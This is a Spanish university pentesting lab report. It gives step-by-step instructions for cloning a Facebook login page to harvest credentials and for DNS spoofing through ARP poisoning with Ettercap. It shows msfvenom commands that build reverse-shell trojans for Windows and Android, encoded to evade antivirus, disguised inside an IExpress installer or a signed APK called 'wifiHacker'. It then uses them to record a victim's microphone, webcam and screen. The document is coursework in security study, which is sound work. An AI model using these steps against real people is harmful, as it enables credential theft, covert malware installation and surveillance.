Está en la página 1de 33

Laboratorio 1

Pentesting

Sebastián Vásquez Mejía - 1701410031

Presentado a: Gustavo Isaza

Universidad de Caldas
Seguridad Informática
Manizales - Caldas
26/02/2019
1) Reconocimiento Pasivo:

Durante la realización de este reconocimiento pasivo fueron utilizadas las herramientas Setoolkit y
Ethercap.

La dirección IP de la víctima será obtenida por medio de la clonación de una página web
(Facebook), además se partirá de un supuesto de que el servidor DNS se envenenó añadiendo el
registro IP del atacante.

Sin más por dejar en claro, empecemos con los pasos a seguir para el reconocimiento:

1. Ejecutar Setoolkit.

2. Una vez en la herramienta, debemos iniciar con una selección de opciones para la
clonación a la cual nos referíamos anteriormente.
a. Seleccionamos inicialmente Social-Engineering Attacks.
b. Ya con un ataque de ingeniería social establecido, seleccionamos Website Attack
Vectors.

c. Seleccionamos Credential Harvester Attack Method.


d. Seleccionamos Site Cloner.

3. Ya con las opciones dadas anteriormente, llegaríamos al momento de configurar el ataque


partiendo desde el sitio a clonar.
a. Debemos conocer nuestra IP como atacantes.

b. Conociendo nuestra dirección, proporcionamos la misma a la herramienta, así


como también el url del sitio a clonar.

4. Con lo anterior, se nos informa que el servicio creado está “escuchando”.


5. Al ingresar a nuestra url clonada la víctima, el servidor nos informa su dirección IP

6. Además de esto, como la página clonada es un inicio de sesión, obtenemos información


como correo y contraseña de la víctima.

Envenenamiento DNS

Ya configurado en su totalidad Setoolkit procedemos a la configuración de Ettercap.

7. Para hacer nuestro DNS Spoofing por medio de Ettercap debemos realizar varias
modificaciones.
a. Modificaremos el archivo “etter.conf”, a este mismo accedemos en la ruta
“/etc/ettercap/”

En los datos resaltados ec_uid y ec_gid cambiamos sus valores de 65534 a 0.


b. Otorgamos permisos al archivo “etter.dns” ubicado en el mismo directorio.

c. Asignados ya los permisos, modificamos este archivo así:

En los campos donde se encuentran las direcciones de Microsoft ponemos nuestra


url clonada y nuestra IP.

8. Ahora, resta configurar Ettercap para que todas las solicitudes que sean enviadas por la
víctima pasen primero por nuestro servidor, pudiendo hacer el DNS Spoofing.
a. Ejecutamos “ettercap –G”, con lo cual se abrirá el entorno gráfico de la
herramienta.
b. En la opción “sniff” seleccionamos “unified sniffing” donde debemos seleccionar la
interfaz de internet que estemos utilizando.
c. En la opción “hosts” escaneamos todos los hosts, y posteriormente los listamos.

d. En este punto, ya reconocemos pasivamente la IP de nuestra víctima, requerimos


saber el Gateway, el cual se puede saber desde nuestro ordenador.

DNS Spoofing permite que el tráfico de la víctima pase primero por el atacante
antes de ser redireccionado a internet, este ataque se conoce como Mitm (ataque
de hombre en el medio).

e. Teniendo ya las direcciones IP de la víctima y del Gateway reconocidas, las


añadimos a target 2 y target 1 respectivamente.

f. En la opción “plugins” seleccionamos “dns_spoof”.


g. En la opción “mitm” seleccionamos “ARP poisoning”, con lo cual nos abrirá un
cuadro de confirmación, elegimos la opción “Sniff remote connections” y
aceptamos.

h. Con lo anterior se da por finalizada la configuración, únicamente resta iniciar el


sniffing.

9. En este punto, el servicio está completo, incluido el envenenamiento de la víctima, con lo


cual su tráfico pasará por nuestro servidor previo a pasar a internet, de esta manera, al
ingresar a la url que hemos clonado, se nos registrará esto en el servidor.

10. Dentro de la dirección url clonada, al ingresar la víctima su información no ocurrirá nada,
pero en el servidor se verán reflejadas todas las credenciales proporcionadas.

11. La información puede ser accedida en el directorio “/var/www/html”

2) Reconocimiento Activo:

Durante la realización de este reconocimiento activo se utilizó NMAP (Netwrok Mapper), es una
herramienta con la cual se puede escanear una red y por medio de este escaneo detectar los hosts
dentro de ella, qué servicios tienen activos, su SO, entre otros.

1. Identificamos la red en la cual estamos, para su posterior escaneo.

Teniendo nuestra IP y nuestra mascara, podemos deducir nuestra dirección de red.

2. Hacemos un escaneo completo de la red, en el cual buscaremos los host activos de la


misma por medio del comando “nmap –sP 192.168.1.0/24”
Los parámetros:
- -sP  Tipo de sondeo, habilita el sondeo de ping que determina si el host está activo.
- “192.168.1.0”  Objetivo, red que será escaneada.

3. Habiendo encontrado todos los host de la red, debemos escanear los puertos de nuestra
víctima por medio del comando “nmap –sV –A 192.168.1.74”

- -sV  Permite encontrar los servicios que están corriendo sobre el sistema y su
versión.

Escaneo de vulnerabilidades con OpenVas


3) Explotación: Desde el Metasploit Framework se deben parametrizar al menos 3 exploits de
diferentes categorías y ser lanzados al menos a 3 objetivos diferentes (Sistemas Operativos, APPs,
Protocolos).

Msfvenom
Es la unión de msfpayload y msfencode. Cabe resaltar que msfpayload se encarga de generar
payloads para distintas plataformas, mientras que msfencode se encarga de codificar dichos
payloads con el objetivo de evadir la detección mediante el uso de antivirus.

Iniciemos…

Lo primero que debemos hacer es generar la carga usando msfvenom. establecer el puerto en 4444
e IP local. El troyano generado intentará conectarse a Esta IP y puerto cuando se ejecute. El siguiente
comando generará el troyano en formato .exe.

Msfvenom –p windows/meterpreter/reverse_tcp LHOST=192.168.1.71 LPORT=4444 –e


x86/shikata_ga_nai –f exe > /root/Escritorio/venom.exe

Un troyano se generará en el escritorio. Ahora debemos hacer que nuestra víctima tenga este
ejecutable “venom.exe” disponible para ejecutarlo en su ordenador. Por ahora lo siguiente que
debemos hacer es ejecutar el Metasploit.

Ahora que iniciamos el msfconsole, utilizamos el manejar “msf>” para continuar y cambiamos el
payload

Cambiamos el puerto local y cambiamos el local host o sea la IP del atacante y por último
ejecutamos nuestro exploit

Ahora lo siguiente es hacer que nuestro objetivo (víctima) ejecute nuestro exploit sin que lo detecte
sus programas defensivos, una buena estrategia para hacer esto es utilizar IExpress de Windows.
IExpress lo utilizaremos para mezclar o combinar nuestro ejecutable con el ejecutable de cualquier
otra cosa así:

Ejecutamos el comando Windows + R y escribimos iexpress

Seleccionamos para crear un nuevo archivo de auto extracción y le damos click en siguiente.

Extraer los archivos y ejecutar el instalador y click en siguiente.

Ingresamos el título que queremos que aparezca en los cuadros de dialogo.


Ponemos el mensaje de confirmación para el usuario.

Creamos una licencia para poder insertarla en nuestro instalador.


Luego agregamos los ejecutables que queremos mezclar, en esta parte introducimos nuestro
exploit.
Ahora seleccionamos que ejecutable se ejecuta primero que el otro, se recomiendo poner primero
nuestro exploit y seguido el otro ejecutable.

Dejamos la ventana por defecto

Ahora ponemos el mensaje que se mostrara al finalizar la instalación.


Ponemos el nombre que va a tener nuestro nuevo instalador

Ahora le damos en siguiente


Ponemos la opción de reiniciar si es necesario

Volvemos a dar siguiente

Y por último le damos siguiente para crear el paquete


Ahora que terminamos nuestro cubrimiento del exploit podemos pasárselo a la víctima para que
esta lo ejecute e inicie sesión en nuestro payload.

Ya que tenemos a nuestra víctima en nuestras manos podemos empezar.

Ya tenemos acceso al host de la víctima

Vamos a grabar un audio

Como resultado tenemos la siguiente nota de voz

Ahora tomemos fotos con la cámara de la víctima


Tenemos como resultado

Ahora vamos a tomar un pantallazo de lo que está haciendo en estos momentos nuestra víctima en
su pc.
Ahora crearemos una carpeta nueva en el escritorio de nuestra victima

Ahora vamos a hacer streaming con la víctima nos aparecerá en nuestro navegar una conexión por
cámara con nuestra víctima.
Msfvenom para Android
Primero vamos a crear nuestro APK malicioso con msfvenom para generar una conexión TCP inversa
con nuestra víctima.

LHOST = IP atacante

LPORT = número de puerto

R = formato sin formato (seleccionamos apk).

Obtendremos esto
Ahora utilizaremos la herramienta keytool para autentificar nuestro apk malicioso llenando todos
los campos requeridos.

Continuamos con la certificación con jarsigner

Y por último utilizaremos zipalling para terminar con la autentificación. Primero debemos instalarlo
Una vez instalado podemos utilizarlo con el comando:

Zzipalign –v 4 root/Escritorio/Android.apk root/Escritorio/wifiHacker.apk

Ahora que ya tenemos nuestro apk malicioso autentificado debemos iniciar el oyente iniciando la
máquina de exploit multi/handler

Entramos al msfconsole.

Iniciamos el exploit multi/handler

Cambiamos el payload

set payload android/meterpreter/reverse_tcp

Cambiamos el LHOST el cual es nuestra IP o sea la IP del atacante

Terminal: set LHOST “IP del atacante”

Cambiamos el LPORT

Terminal: set LPORT 4444

Entonces ahora ya podemos ejecutar exitosamente el exploit y comenzar a escuchar el dispositivo


Android. Ahora, el dispositivo instala nuestra aplicación en el dispositivo y se infiltra con el exploit

Teniendo el apk la víctima la ejecutara

Cuando nuestra víctima ejecute el apk malicioso se mostrará que tenemos una sesión abierta.
Ahora ya tenemos acceso al dispositivo. Ahora podemos ver varias propiedades de la víctima como,
por ejemplo:

- Ifconfig

- Shell

- Sysinfo

Con el comando “help” podemos observar un listado de comandos disponibles


Con el comando “ls” veremos todos los directorios de acceso disponibles

Ahora accederemos a las carpetas que contenga en la SDCard

Ahora grabaremos una nota de voz con el micrófono del dispositivo


Ahora haremos streaming

Y por último tomaremos una foto con la cámara trasera del dispositivo

Se tiene como resultado


Metasploitable 2
Para continuar, es importante verificar que ambas máquinas tengan visibilidad entre sí (es decir,
que puedan comunicarse). Esto puede corroborarse con un simple ping entre las dos.

Information gathering
Para recopilar información es posible utilizar Nmap desde la propia consola de Metasploit. Para
ello, basta con solo invocar el comando “nmap”. Los parámetros que pueden utilizarse son los
mismos que acepta Nmap. De esta manera, los resultados serán almacenados en la base de datos
de Metasploit.
Para obtener una observación rápida del sistema objetivo, se ingresa el siguiente comando:

nmap {dirección ip} -p 1-65535

En este caso {direccio ip } - 192.168.1.70


Con el comando anterior se realiza un escaneo sobre todos los puertos del sistema objetivo. De
esta manera, tal como se especificó anteriormente, los resultados serán almacenados en la base
de datos. Para consultarlos, es necesario ingresar alguno de los siguientes comandos:
· Hosts: Imprime por pantalla información de todos los sistemas que fueron analizados.
· Services: Imprime por pantalla todos los puertos y servicios asociados que fueron descubiertos
durante el análisis con Nmap.
· Vulns: Describe las vulnerabilidades que fueron descubiertas durante el análisis.
Sin embargo, en esta instancia es posible que no se cuente con demasiada información sobre los
servicios descubiertos en el sistema objetivo. De esta manera, utilizando la misma herramienta
(Nmap) es posible determinar, por ejemplo, la versión específica de un servicio. Esto se puede
lograr mediante el siguiente comando:
Ahora abrimos el msfconsole y digitamos:

nmap –sV {dirección ip} –p {puerto de interés}

Explotación
Suponiendo que se ha encontrado información de un servicio en especial, es posible determinar a
partir de ésta, si el mismo es vulnerable. Utilizando la consola, se realiza una búsqueda de
un exploit en particular para ese servicio y luego se llevará a cabo la explotación del mismo. Para
realizar la búsqueda se ingresa el siguiente comando:
Después de identificar el servicio se digita como ejemplo el siguiente comando:

Help search:vsftpd

Para seleccionar el exploit se introduce el comando “use” seguido de la ruta


del exploit seleccionado. En este caso el comando sería el siguiente:

Una vez seleccionado el exploit que se va a utilizar, se deben configurar aquellos parámetros
necesarios a través de la consola. Para ver las opciones, se debe ingresar el comando “show
options”, el cual enumera todos los parámetros indicando si son opcionales u obligatorios
mediante el campo “required”.
En esta instancia, ya es posible configurar los parámetros. Para realizar esta tarea se debe utilizar
el comando “set”seguido del parámetro y el valor que se desea establecer. Para este ejemplo, el
comando es el siguiente:

> set RHOST 192.168.1.70

Payload
Básicamente, el payload es la secuencia de instrucciones que se ejecutarán una vez que se haya
explotado con éxito la vulnerabilidad. Metasploit Framework posee diversos payloads con
diferentes funcionalidades para cada tipo de arquitectura. Mediante el comando “show
payloads” se pueden visualizar cuáles son compatibles. De esta forma, se utiliza el siguiente
comando para establecer el payload:

En este caso hemos elegido el payload cmd/unix/interact. Sin embargo, para conocer todos
los payloads que son compatibles con el exploit que se va a utilizar, existe un comando para realizar
el listado correspondiente:

> show payloads


De la misma manera, si se desea conocer cuáles son los parámetros configurables
del payload seleccionado, es posible ejecutar el comando:

> show options

Luego de que todos los parámetros ya han sido configurados, será posible llevar a cabo la
explotación. Para ello, basta con ejecutar el comando “exploit” y esperar que Metasploit haga su
trabajo.

En esta instancia, si todo ha resultado bien, se obtiene una shell de comandos sobre el sistema que
ha sido atacado, permitiendo ejecutar cualquier comando en dicho sistema. Por ejemplo, a
continuación se puede observar un comando de listado de directorios:

También podría gustarte